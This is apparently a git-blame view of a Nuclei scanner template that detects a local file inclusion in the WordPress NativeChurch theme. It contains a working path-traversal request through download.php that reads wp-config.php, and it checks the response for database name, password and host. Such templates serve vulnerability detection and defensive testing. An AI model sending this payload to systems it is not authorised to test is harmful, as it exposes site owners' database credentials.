2021-07-15 09:41:08 +00:00
|
|
|
id: nativechurch-wp-theme-lfd
|
|
|
|
|
|
|
|
info:
|
2022-07-29 14:04:23 +00:00
|
|
|
name: WordPress NativeChurch Theme - Local File Inclusion
|
2021-07-15 09:41:08 +00:00
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2022-08-10 09:06:49 +00:00
|
|
|
description: |
|
|
|
|
WordPress NativeChurch Theme is vulnerable to local file inclusion in the download.php file.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/132297/WordPress-NativeChurch-Theme-1.0-1.5-Arbitrary-File-Download.html
|
2022-08-06 16:54:58 +00:00
|
|
|
- https://wpscan.com/vulnerability/2e1062ed-0c48-473f-aab2-20ac9d4c72b1
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2023-10-14 11:27:55 +00:00
|
|
|
tags: wp-theme,lfi,wp,packetstorm,wpscan,wordpress
|
2021-07-15 09:41:08 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-07-15 09:41:08 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
2022-08-10 09:06:49 +00:00
|
|
|
part: body
|
2021-07-15 09:41:08 +00:00
|
|
|
words:
|
|
|
|
- "DB_NAME"
|
|
|
|
- "DB_PASSWORD"
|
2021-07-15 12:13:45 +00:00
|
|
|
- "DB_HOST"
|
|
|
|
- "The base configurations of the WordPress"
|
2021-07-15 09:41:08 +00:00
|
|
|
condition: and
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 4b0a00483046022100c6f65699021d81e0f72c6de7cc9196286f921143395769007b138c4f55a76c8e022100b5f3e2ee8c6be8e43d5b9c376435dd16f20c09a2dc755adf4d3ee7154432fff1:922c64590222798bb761d5b6d8e72950
|